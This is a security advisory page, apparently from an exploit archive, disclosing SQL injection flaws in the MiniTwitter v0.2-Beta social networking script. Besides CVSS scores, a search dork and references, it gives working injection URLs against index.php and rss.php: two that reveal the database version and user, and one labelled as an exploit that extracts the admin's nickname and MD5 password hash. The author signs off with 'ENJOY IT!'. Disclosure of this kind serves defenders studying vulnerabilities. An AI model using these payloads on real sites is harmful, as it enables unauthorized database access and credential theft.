MiniTwitter v0.2-Beta SQL Injections

2009.07.23
Credit: y3nh4ck3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--------------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES --MiniTwitter v0.2-Beta--> --------------------------------------------------------------------- CMS INFORMATION: -->WEB: http://mt.bioscriptsdb.com/ -->DOWNLOAD: http://sourceforge.net/projects/minitt/ -->DEMO: http://www.bioscripts.net/minitwitter/index.php -->CATEGORY: Social Networking -->DESCRIPTION: Your business needs a private twitter. You can add... several twitters account and use this twitter as a buckup of all... -->RELEASED: 2009-04-30 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "BioScripts" -->CATEGORY: SQL INJECTION (SQLi) -->AFFECT VERSION: <= 0.2 Beta -->Discovered Bug date: 2009-04-30 -->Reported Bug date: 2009-04-30 -->Fixed bug date: 2009-05-01 -->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/ -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cu&#241;ada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ############################## ////////////////////////////// SQL INJECTION (SQLi): ///////////////////////////// ############################## <<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>> <<<<---------++++++++++++++++ Condition-2: Be register user +++++++++++++++++++--------->>>> This aplication is completely vulnerable to sql injection. ----- PoC: ----- File: index.php Var: GET var 'user' --> http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version ()/* Return --> Database version. File: inc/rss.php Var: GET var 'user' --> http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/* Return --> Database user. --------- EXPLOIT: --------- http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat( nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/* Return --> nick:::password(md5 hash) <<<-----------------------------EOF---------------------------------->>> ENJOY IT!

References:

http://xforce.iss.net/xforce/xfdb/50282
http://www.securityfocus.com/bid/34795
http://www.securityfocus.com/archive/1/archive/1/503155/100/0/threaded
http://www.milw0rm.com/exploits/8586


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top